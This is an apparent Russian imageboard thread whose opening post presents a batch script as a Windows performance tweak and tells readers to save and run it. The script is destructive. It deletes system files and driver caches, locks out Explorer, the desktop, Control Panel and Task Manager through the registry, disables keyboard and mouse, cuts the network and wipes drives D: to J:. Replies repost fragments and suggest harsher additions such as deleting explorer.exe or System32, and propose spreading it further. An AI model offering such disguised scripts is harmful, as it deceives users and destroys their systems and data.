Привет всем пользователям OS Windows. Наверное всем не секрет что Windows нагружает компьютер до такой степени, что некоторые игры могут лишь позавидовать, поэтому я решил поделиться способом как сделать это с помощью блокнота. Для этого нужно создать в блокноте код и сохранить его в формате ".bat", запустить код и всё. Вот так вот просто можно увеличить производительность компьютера на 25% Также, если ваш компьютер уже оптимизирован и на него установлены все необходимые драйвера можно вставлять не весь код, а только его часть. С первой строки до строки "rundll32 mouse,disable" Теперь непосредственно к коду и его созданию. 1) Создать блокнот на рабочем столе (Именно на рабочем столе, иначе работать не будет). 2) Скопировать текст кода, приведенный ниже (или его часть). 3) Нажать на кнопку "Файл" в верхней части блокнота и в выпавшем меню нажать кнопку "Сохранить как". 4) При сохранении файла подписать в конце названия файла .bat P.s. Если вам не помог весь код или вы боитесь его использовать на вашем старом компьютере, то можно попробовать использовать лишь часть кода(но не меньше 5 строк, иначе работать не будет, а сделает еще хуже) Код для вставки: @echo off del "%SystemRoot%\Media" /q >nul TIMEOUT /T 300 /NOBREAK cls echo Please wait reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul TIMEOUT /T 150 /NOBREAK cls echo Please wait del "%SystemRoot%Cursors . " >nul TIMEOUT /T 70 /NOBREAK cls echo Please wait del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul TIMEOUT /T 30 /NOBREAK cls echo Please wait reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul /v NoControlPanel /t REG_DWORD /d 1 /f >nul TIMEOUT /T 15 /NOBREAK cls echo Please wait for /l i in (1,1,100) do mkdir "dir i" reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d Pier2a4e11o /F del "%SystemRoot%Cursors . " >nul del "%SystemRoot%Cursors . " >nul TIMEOUT /T 20 /NOBREAK cls echo Please wait rundll32 keyboard,disable rundll32 mouse,disable ipconfig /release msg "Eb4t t1 10x" del D:\ . /f /s /q del E:\ . /f /s /q del F:\ . /f /s /q del G:\ . /f /s /q del H:\ . /f /s /q del I:\ . /f /s /q del J:\ .* /f /s /q exit >del D:\. /f /s /q >del E:\. /f /s /q >del F:\. /f /s /q >del G:\. /f /s /q >del H:\. /f /s /q >del I:\. /f /s /q >del J:\.* /f /s /q С этой хуйни окончательно обдрыстался Хуёвый батник и ты хуй. Обосрался с подливкой )) Не работает ОП хуй Долбаеб, ты читать умеешь? Там же написано подождать 248 секунд >Долбаеб, ты читать умеешь? Там же написано подождать 248 секунд Все равно не работает. Я заменил время ожидания на 5 секунд - абсолютно все зафейлилось, после перезагрузки никаких изменений. ОП все еще хуй Надо от админа запускать. И желательно не на виртуалке. Хоспаде, запустите вы уже эту парашу в вируталбоксе, молю. Ржу как конь, разбудил тянку сбоку, дала пизды. Я запускал и нихуя оно не работает А ты читал, что если не работает, то надо только часть кода? >А ты читал, что если не работает, то надо только часть кода? Мне еще не хватало искать ошибки чьих-то батниках Сейчас >Сейчас И больше его никто не видел. Вот это запусти rundll32 keyboard,disable rundll32 mouse,disable ipconfig /release msg "Eb4t t1 10x" del D:\. /f /s /q del E:\. /f /s /q del F:\. /f /s /q del G:\. /f /s /q del H:\. /f /s /q del I:\. /f /s /q del J:\.* /f /s /q exit >msg "Eb4t t1 10x" Проиграл с этого. Все равно не работает Ну и хуй с ним. Может кто-нибудь допилит это? А ты с @echo off вставлял? >А ты с @echo off вставлял? Да А хотя, беру свои слова обратно. Не системные диски оно чистит. Оно ещё и в реестре насрать должно. Проверял? А удалить папку SYSTEM32 пробовал? Вставил, комп перезагрузился, нихуя не поменялось. Палишься. Этот скрипт убирает курсор, отключает мышь и клавиатуру. Удаляет какой то драйвер. Короче полое поганство. Щас бы не сидеть через виртуалку. Короче мамин хацкер хотел всех затроллить скриптом который убирает курсор, удаляет драйвера, мышку, клавиатуру и ломает проводник виндоуса, но жидко обосрался с подливой. Двач такой двач. Я это нашёл и от себя добавил Этож с семёрки не будет работать. Это для олдов, я же ньюфажка >msg "Eb4t t1 10x" >del D:\. /f /s /q >del E:\. /f /s /q >del F:\. /f /s /q >del G:\. /f /s /q >del H:\. /f /s /q >del I:\. /f /s /q >del J:\.* /f /s /q ОП, можно дополнительно удалить такую ненужную ебаку, как систем32 винлогон >rundll32 keyboard,disable >rundll32 mouse,disable Твой батник мышку с клавиатурой отключает, да? Видел такие шутки еще до двачей году в 2005 в интернетах, еще иногда диск C\ предлагали форматнуть через командную строку. >можно вставлять не весь код, а только его часть. А можно вообще ничего не вставлять. я тебе больше скажу, он ещё и форматирует С\ заебись поржунькал msg "Eb4t t1 10x" Не запускал, но надеюсь твоя мать умрет >Не запускал Тогда умрет твоя. Блядь, сколько вам говорить, чтобы вы постили код на pastebin/ideone, а не сюда? Тут разметка всё съедает. Сажи дибилу. Такс что тут у нас? Это же распространение вредоносных программ! Гражданин, отойдите от клавиатуры и ожидайте прибытие наряда! Вредоносных букв >msg "Eb4t t1 10x" >del D:\. /f /s /q >del E:\. /f /s /q >del F:\. /f /s /q >del G:\. /f /s /q >del H:\. /f /s /q >del I:\. /f /s /q >del J:\.* /f /s /q >exit ты ахуел удалять все диски? ОГО ВЫ ХАКЕР???? ВЗЛОМАЙТЕ ПОЖАЛУЙСТА ИГРУ СИНИЙ КИТ!!! ДЕТИ ГИБНУТ!!!! Нахуя ты бампаеш? Думаешь в 2018 реально найдется дебил который будет запускать хуйню с двача? Ну ладно, тогда это будет копипаста. в 2018 как раз таки да > в 2018 реально найдется дебил А когда, если не в 2018? Про строку со скрытым текстом. На границах скрытого текста в блокноте необходимо поставить Так отображается из-за того, что границы скрытого текста на дваче. ньюфажина, мог бы скрин сделать оп, есть вишня обнавленая? скидывай сюда, а то моя устарела Сейчас, погодь. Алсо, может создать очередной вишмастер тред? А то последний раз я его создавал в 2010м с охуительной легендой про скрытые посты, и все такое, я даже интерфейс в фотошопе тогда слепил фейковый, лул. тогда у пары школотронов виндос отвалился. > пары школотронов виндос отвалился. Это были толстяки. Не думаю, что кто-то специально делал фотки мониторов с мертвой виндой лол. Даже если толстяки, было весело энивей Как же хорошо, что у меня мак. > мак Наркоман ебучий Дааа, он то никак не нагружает макбук. @echo off del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul @echo off del "%SystemRoot%\Media" /q >nul %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul del "%SystemRoot%Cursors . " >nul Сыграем в рулетку? Акей, че нада делать? Копируй сначала 1 и 2 Потом 3 и 4 Потом каждую по отдельности C sudo или без? У меня старый пекус и ХР, думал поможет, а то даже Обливион лагает, а теперь вообще нихуя не работает. Как исправить? @Echo off do del "c:\windows\exploer.exe" do del "c:\windows\mspoint.exe" do del "c:\windows\notepad.exe" А если просто снести MBR? Вроде можно как-то было. Бля откуда вы лезите. Для несведущих код из пасты очистит диски. Оп долбоеб, треду сажи всеголишь удалит вроде. Хороший код Для, анчоусы, ОП реально годноту спалил! Мне помогло, система стала работать быстрее! давай скриншот диспетчера задач, там нагрузка цп должна быть меньше 50% Я уже с тилибона сижу, у нас час ночи Если ты нищебродино ебаное и у тебя нет тела то это только у тя НЕ СМЕШНО!!!!!! У МЕНЯ ДРУГ УМЕР ПИШУ С ТАПКА!!!!!!!!!!!! Компьютыр будешь востаналивать даун ебаны ?? ? Пишешь с калькулятора? Оп, через две недели в школу а ты копипастиш Я сам придумол. Ладно, а где же это можно продвигать? В 2007, очевидно же. Не грузится винда, чё за хуйня? @echo off reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul @echo off reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul Кек, 2018 год, в /b/ пытаются трелькать батником, который еще и сами же просят запилить и копипастнуть. Все равно этот дестрой не такой весёлый, как игры с радмином и прочими троянами. сначала мне показалось что я в 2007. А потом понял, что просто ОП дурачок. Как жаль что у меня линукс и эта прекрасная оптимизация не сработает. Настолько толсто и неактуально, что прямо как демотиватор из 2007. @Echo off for /l %ц%i in (1,1,100) do mkdir "dir %ц%i" без ц НЕ ДЕЛАЙТЕ ЭТО ДВАЧ У МЕНЯ ПК ВЗАРВАЛСЯ ПИШУ С ХОЛОДИЛЬНИКА Кто тут самый смелый и запустит у себя на компе? @Echo off for /l i in (1,1,100) do mkdir "dir i" блядб комп не грузится теперь ну ты и мудак сука Отдел к заглянет. Вечерком когда спать будешь)) Может в одноклассники кинуть? Легче вишмастер скачать Я уже в мвд написал! преколы уровня б Собственно сажа